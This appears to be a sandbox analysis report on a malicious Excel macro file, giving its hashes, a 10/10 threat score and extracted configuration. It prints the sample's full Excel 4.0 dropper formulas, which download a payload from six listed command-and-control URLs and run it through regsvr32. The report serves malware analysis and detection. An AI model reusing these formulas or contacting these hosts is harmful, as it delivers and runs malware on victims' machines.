Overview

overview

10

Static

static

10

51c8699296...f.xlsm

windows7-x64

10

51c8699296...f.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    51c869929617fbebb2b2e1a6b278a8641163f92513d4f77b46fafd07fd4eb6cf

  • Size

    49KB

  • Sample

    241120-v5mt3s1bqk

  • MD5

    614daa89f3fab900d1bdf89670eaed6b

  • SHA1

    4f2d8929a2616cd546ba804923e092bf7489c76c

  • SHA256

    51c869929617fbebb2b2e1a6b278a8641163f92513d4f77b46fafd07fd4eb6cf

  • SHA512

    78dea71e5600fdd0315a8531ee5438df2e9ce2ddc55f57dcd7ff200c4fd9374b7dd447c6d87c3ac7c1682dbe684472cee8a70a5c505ad26ae64135906d8dfe61

  • SSDEEP

    768:mYCKEWvxLh0lSQHAamYDSmPq9A3Bj9DLC+9uSEcmQThnuG3KA05lAMIB:mYu2xXncDSmSIBlGeuSEcm2h0B5lqB

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://retailhpsinterview.com/search/yNbsL/

http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/

http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/

http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/

https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/

https://gsmjordan.com/SupplierPanel/XII/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://retailhpsinterview.com/search/yNbsL/","..\ax.ocx",0,0) =IF('LGGDGB'!E11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/","..\ax.ocx",0,0)) =IF('LGGDGB'!E13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/","..\ax.ocx",0,0)) =IF('LGGDGB'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/","..\ax.ocx",0,0)) =IF('LGGDGB'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/","..\ax.ocx",0,0)) =IF('LGGDGB'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://gsmjordan.com/SupplierPanel/XII/","..\ax.ocx",0,0)) =IF('LGGDGB'!E21<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\ax.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://retailhpsinterview.com/search/yNbsL/
xlm40.dropper

http://www.agretto.com/Template/pnM0iPs4b2IfR7XY7v/
xlm40.dropper

http://www.agnesleung.com/raw.backup/p8D6ttXDaNwd/
xlm40.dropper

http://xnxx.c1.biz/images/iJNVpahOW4CBuidDD66/
xlm40.dropper

https://pakistannakliye.com/Dodonian/tSasxFCiQXxh5Qvin/
xlm40.dropper

https://gsmjordan.com/SupplierPanel/XII/

Targets

    • Target

      51c869929617fbebb2b2e1a6b278a8641163f92513d4f77b46fafd07fd4eb6cf

    • Size

      49KB

    • MD5

      614daa89f3fab900d1bdf89670eaed6b

    • SHA1

      4f2d8929a2616cd546ba804923e092bf7489c76c

    • SHA256

      51c869929617fbebb2b2e1a6b278a8641163f92513d4f77b46fafd07fd4eb6cf

    • SHA512

      78dea71e5600fdd0315a8531ee5438df2e9ce2ddc55f57dcd7ff200c4fd9374b7dd447c6d87c3ac7c1682dbe684472cee8a70a5c505ad26ae64135906d8dfe61

    • SSDEEP

      768:mYCKEWvxLh0lSQHAamYDSmPq9A3Bj9DLC+9uSEcmQThnuG3KA05lAMIB:mYu2xXncDSmSIBlGeuSEcm2h0B5lqB

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks